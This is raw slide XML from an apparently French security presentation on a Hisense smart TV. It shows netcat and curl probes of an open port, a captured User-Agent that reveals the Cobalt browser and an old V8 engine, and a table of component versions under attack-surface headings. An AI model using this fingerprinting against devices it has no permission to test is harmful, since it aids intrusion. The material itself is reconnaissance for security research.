                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CDCCCDF-B3E2-5319-ADE3-79C0212AF0D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4917624" y="1312967"/>
            <a:ext cx="4104456" cy="1546577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 192.168.1.67 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>zddsd</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Error</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type:text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length:27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP headers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F7B82F6-EAC6-1E5D-2A63-F7D76688B9BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4917624" y="3006080"/>
            <a:ext cx="4483563" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://192.168.1.67:4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4F23928-FEFB-40BC-E16C-C877B333838B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382895" y="2391566"/>
            <a:ext cx="2562544" cy="20809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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="ZoneTexte 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C905A90-5AC3-C5D6-B05B-9E3F9E29B252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2998779" y="2345572"/>
            <a:ext cx="788070" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WTF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16803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FDF33B2-672E-956F-CE7F-E447DA9B5FAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B952C77-05B1-5211-932E-7F3DD4F7B67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DA705836-662B-8269-3ED7-AAB5F0FC4466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Webdriver</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A45F77-A493-EDDD-4EF5-C253428B566A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Recherche de vulnérabilités</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7B3F181-9831-73EA-5EA7-3BF47FF008A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque réseau</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Image 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8670A8E-13B9-D49B-920D-C7444FC5FEA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="872169" y="1315427"/>
            <a:ext cx="7665720" cy="1585044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="ZoneTexte 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F05E772-76BC-AF09-121B-47362BFC92A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349879" y="3032614"/>
            <a:ext cx="8428995" cy="1785104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Host-001 50274 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /index.html HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: 192.168.1.48:8000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mozilla/5.0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DirectFB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; Linux x86_64) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cobalt/19.lts.3.194831-qa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unlike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Gecko) v8/6.5.254.43 skia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Starboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/10 _DESKTOP__/ (, , ) (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 FVC/4.0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hisense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; SmartTV_2019_1; )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept-Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip,deflate</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept-Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: en-US</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept-Charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: utf-8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23129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E103B984-F5BA-8A3B-DC9B-78BD9D8B74D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="1217663"/>
            <a:ext cx="8499877" cy="595536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Cobalt est un conteneur d’application HTML5/CSS/JS conçu pour les systèmes avec peu de ressources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E03B0434-58C0-1262-C150-2ACC50897EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1E1754C-F637-2735-4F8E-3A793EE99CF6}"/>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A67D115B-97EE-D3DA-BA79-500BD28A0E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque navigateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A7C8D1-A963-B06F-98CA-91BCB59E5347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque logicielle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Tableau 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A87E2F4A-3552-9F0F-59F9-5EDEDC0552C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925944706"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="358419" y="1828499"/>
          <a:ext cx="8420455" cy="2219903"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1298592">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="127307226"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1753807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3934298365"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5368056">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="478594169"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="377519">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="800"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Composants</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </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a:effectLst/>
                        </a:rPr>
                        <a:t>Version </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600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Commentaires</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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57070863"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="574151">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="800"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>V8 Engine </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400" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>6.5.254.43 (Feb 2018)</a:t>
                      </a:r>
